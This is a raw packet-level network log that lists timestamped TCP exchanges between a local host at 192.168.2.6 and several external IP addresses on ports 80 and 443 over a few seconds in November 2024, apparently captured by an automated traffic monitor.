                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.281229019 CET8053776208.100.26.245192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.288928032 CET5377680192.168.2.6208.100.26.245
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.319842100 CET8054730199.59.243.227192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.320591927 CET5473080192.168.2.6199.59.243.227
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.416110992 CET50210443192.168.2.699.83.170.3
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.416135073 CET4435021099.83.170.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.416491985 CET4435021099.83.170.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.416699886 CET50210443192.168.2.699.83.170.3
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.418422937 CET50210443192.168.2.699.83.170.3
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.463351011 CET4435021099.83.170.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.494942904 CET805021844.221.84.105192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.495150089 CET5021880192.168.2.644.221.84.105
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.502017975 CET805021844.221.84.105192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.503007889 CET5021880192.168.2.644.221.84.105
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.580316067 CET8050219178.162.203.226192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.580373049 CET5021980192.168.2.6178.162.203.226
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.642998934 CET4435021099.83.170.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.643408060 CET4435021099.83.170.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.643440962 CET4435021099.83.170.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.643486977 CET50210443192.168.2.699.83.170.3
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.643521070 CET4435021099.83.170.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.643532991 CET50210443192.168.2.699.83.170.3
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.643560886 CET50210443192.168.2.699.83.170.3
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.644119024 CET4435021099.83.170.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.644165993 CET50210443192.168.2.699.83.170.3
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.669688940 CET44350220188.114.96.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.669748068 CET50220443192.168.2.6188.114.96.3
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.724435091 CET4435021099.83.170.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.724497080 CET50210443192.168.2.699.83.170.3
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.725713968 CET4435021099.83.170.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.725771904 CET50210443192.168.2.699.83.170.3
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.726977110 CET4435021099.83.170.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.726984978 CET4435021099.83.170.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.727042913 CET50210443192.168.2.699.83.170.3
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.727058887 CET4435021099.83.170.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.727565050 CET4435021099.83.170.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.727608919 CET50210443192.168.2.699.83.170.3
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.727616072 CET4435021099.83.170.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.727627039 CET4435021099.83.170.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.727654934 CET50210443192.168.2.699.83.170.3
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.313743114 CET44352171188.114.96.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.313786030 CET52171443192.168.2.6188.114.96.3
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.314626932 CET44352171188.114.96.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.314692020 CET52171443192.168.2.6188.114.96.3
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.315546989 CET44352171188.114.96.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.315571070 CET44352171188.114.96.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.315608978 CET52171443192.168.2.6188.114.96.3
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.315613985 CET44352171188.114.96.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.315642118 CET52171443192.168.2.6188.114.96.3
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.315660954 CET52171443192.168.2.6188.114.96.3
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.316436052 CET44352171188.114.96.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.316498995 CET52171443192.168.2.6188.114.96.3
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.317346096 CET44352171188.114.96.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.317399979 CET52171443192.168.2.6188.114.96.3
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.318017006 CET44352171188.114.96.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.318078041 CET52171443192.168.2.6188.114.96.3
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.318082094 CET44352171188.114.96.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.318115950 CET44352171188.114.96.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.318239927 CET52171443192.168.2.6188.114.96.3
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.409945011 CET8052164199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.410015106 CET8052164199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.410031080 CET8052164199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.410075903 CET5216480192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.410114050 CET5216480192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.410211086 CET8052164199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.410372972 CET5216480192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.410386086 CET8052164199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.410398960 CET8052164199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.410409927 CET8052164199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.410415888 CET5216480192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.410423040 CET8052164199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.410432100 CET5216480192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.410448074 CET5216480192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.410463095 CET5216480192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.410844088 CET8052164199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.410856009 CET8052164199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.410895109 CET5216480192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.414930105 CET8052164199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.415009975 CET5216480192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.415019035 CET8052164199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.415030003 CET8052164199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.415049076 CET5216480192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.415069103 CET5216480192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.491177082 CET8052164199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.491225958 CET5216480192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.491246939 CET8052164199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.491260052 CET8052164199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.491276979 CET5216480192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.491295099 CET5216480192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.491514921 CET8052164199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.491527081 CET8052164199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.491548061 CET5216480192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.491565943 CET5216480192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.491758108 CET8052164199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.491770029 CET8052164199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.491790056 CET5216480192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.491807938 CET5216480192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.492080927 CET8052164199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.492091894 CET8052164199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.492104053 CET8052164199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.492119074 CET5216480192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.492147923 CET5216480192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.492409945 CET8052164199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.492445946 CET5216480192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.492571115 CET8052164199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.492585897 CET8052164199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.492603064 CET5216480192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.492639065 CET5216480192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.492862940 CET8052164199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.492873907 CET8052164199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.492893934 CET5216480192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.492913008 CET5216480192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.493061066 CET8052164199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.493134022 CET5216480192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.493221998 CET8052164199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.493232965 CET8052164199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.493252039 CET5216480192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.493268967 CET5216480192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.493520021 CET8052164199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.493530989 CET8052164199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.493542910 CET8052164199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.493558884 CET5216480192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.493587971 CET5216480192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.493967056 CET8052164199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.494004011 CET5216480192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.494158983 CET8052164199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.494193077 CET5216480192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.536665916 CET8052164199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.536695004 CET8052164199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.536706924 CET8052164199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.536725998 CET5216480192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.536758900 CET5216480192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.536890030 CET8052164199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.536927938 CET5216480192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.544039965 CET5214580192.168.2.644.221.84.105
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.548118114 CET5216480192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.548147917 CET5216480192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.548996925 CET805214544.221.84.105192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.551872969 CET5215080192.168.2.644.221.84.105
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.552578926 CET50210443192.168.2.699.83.170.3
                                                                                                                                                                                                                  Nov 11, 2024 18:51:12.092629910 CET8050236199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:12.221431971 CET8050234208.100.26.245192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:12.223562002 CET5023480192.168.2.6208.100.26.245
                                                                                                                                                                                                                  Nov 11, 2024 18:51:12.470735073 CET8050228199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:12.471105099 CET5022880192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.295645952 CET5023580192.168.2.63.94.10.34
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.300685883 CET80502353.94.10.34192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.389913082 CET80502353.94.10.34192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.389966965 CET5023580192.168.2.63.94.10.34
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.396689892 CET80502353.94.10.34192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.396745920 CET5023580192.168.2.63.94.10.34
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.400578976 CET5023880192.168.2.6154.212.231.82
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.406059980 CET8050238154.212.231.82192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.406114101 CET5023880192.168.2.6154.212.231.82
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.406519890 CET5023880192.168.2.6154.212.231.82
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.411389112 CET8050238154.212.231.82192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.418508053 CET5023980192.168.2.644.221.84.105
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.423754930 CET805023944.221.84.105192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.423826933 CET5023980192.168.2.644.221.84.105
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.424192905 CET5023980192.168.2.644.221.84.105
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.429207087 CET805023944.221.84.105192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.469182968 CET5024080192.168.2.63.94.10.34
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.470139980 CET5024180192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.474246025 CET80502403.94.10.34192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.474302053 CET5024080192.168.2.63.94.10.34
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.475183964 CET8050241199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.475246906 CET5024180192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.475754023 CET5024280192.168.2.644.221.84.105
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.475848913 CET5024380192.168.2.6162.255.119.102
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.480829000 CET805024244.221.84.105192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.480849981 CET8050243162.255.119.102192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.480885983 CET5024280192.168.2.644.221.84.105
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.480920076 CET5024380192.168.2.6162.255.119.102
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.481998920 CET5024280192.168.2.644.221.84.105
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.487613916 CET805024244.221.84.105192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.506819963 CET5024180192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.511802912 CET8050241199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.522728920 CET5024480192.168.2.6178.162.203.226
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.527710915 CET8050244178.162.203.226192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.527787924 CET5024480192.168.2.6178.162.203.226
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.527920008 CET5024480192.168.2.6178.162.203.226
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.532928944 CET8050244178.162.203.226192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.540594101 CET5024380192.168.2.6162.255.119.102
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.545913935 CET8050243162.255.119.102192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.582881927 CET8050236199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.582953930 CET5023680192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.583087921 CET8050236199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.583098888 CET8050236199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.583133936 CET5023680192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.583167076 CET5023680192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.583590031 CET8050236199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.583601952 CET8050236199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.583636045 CET5023680192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.583652973 CET5023680192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.584451914 CET8050236199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.584465027 CET8050236199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.584503889 CET5023680192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.584503889 CET5023680192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.585352898 CET8050236199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.585365057 CET8050236199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.585421085 CET5023680192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.586185932 CET8050236199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.586246967 CET5023680192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.587841034 CET8050236199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.587908030 CET5023680192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.588012934 CET8050236199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.588056087 CET5023680192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.588526964 CET8050236199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.588578939 CET5023680192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.664012909 CET8050236199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.664078951 CET5023680192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.664222956 CET8050236199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.664233923 CET8050236199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.664283037 CET5023680192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.664721012 CET8050236199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.664735079 CET8050236199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.664767981 CET5023680192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.664783001 CET5023680192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.665591002 CET8050236199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.665607929 CET8050236199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.665642023 CET5023680192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.665663004 CET5023680192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.666254997 CET8050236199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.666270018 CET8050236199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.666312933 CET5023680192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.666327000 CET5023680192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.667069912 CET8050236199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.667083979 CET8050236199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.667136908 CET5023680192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.667192936 CET5023680192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.667967081 CET8050236199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.667980909 CET8050236199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.667990923 CET8050236199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.668020964 CET5023680192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.668057919 CET5023680192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.668857098 CET8050236199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.668869972 CET8050236199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.668903112 CET5023680192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.668929100 CET5023680192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.669796944 CET8050236199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:15.443543911 CET8050241199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:15.443556070 CET8050241199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:15.443593025 CET5024180192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:15.444323063 CET8050241199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:15.444334030 CET8050241199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:15.444377899 CET5024180192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:15.445127010 CET8050241199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:15.445138931 CET8050241199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:15.445149899 CET8050241199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:15.445168018 CET5024180192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:15.445193052 CET5024180192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:15.445771933 CET8050241199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:15.445784092 CET8050241199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:15.445816994 CET5024180192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:15.445838928 CET5024180192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:15.446549892 CET8050241199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:15.446562052 CET8050241199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:15.446594000 CET5024180192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:15.447357893 CET8050241199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:15.447371006 CET8050241199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:15.447408915 CET5024180192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:15.447809935 CET8050241199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:15.447824001 CET8050241199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:15.447848082 CET5024180192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:15.447870016 CET5024180192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:15.520047903 CET8050241199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:15.520172119 CET8050241199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:15.520201921 CET5024180192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:15.520240068 CET5024180192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.545957088 CET5919180192.168.2.699.83.170.3
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.546055079 CET5919280192.168.2.6154.212.231.82
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.551091909 CET805919199.83.170.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.551109076 CET8059192154.212.231.82192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.551157951 CET5919180192.168.2.699.83.170.3
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.551229954 CET5919280192.168.2.6154.212.231.82
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.555241108 CET5919280192.168.2.6154.212.231.82
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.560065985 CET8059192154.212.231.82192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:17.440397978 CET8059192154.212.231.82192.168.2.6
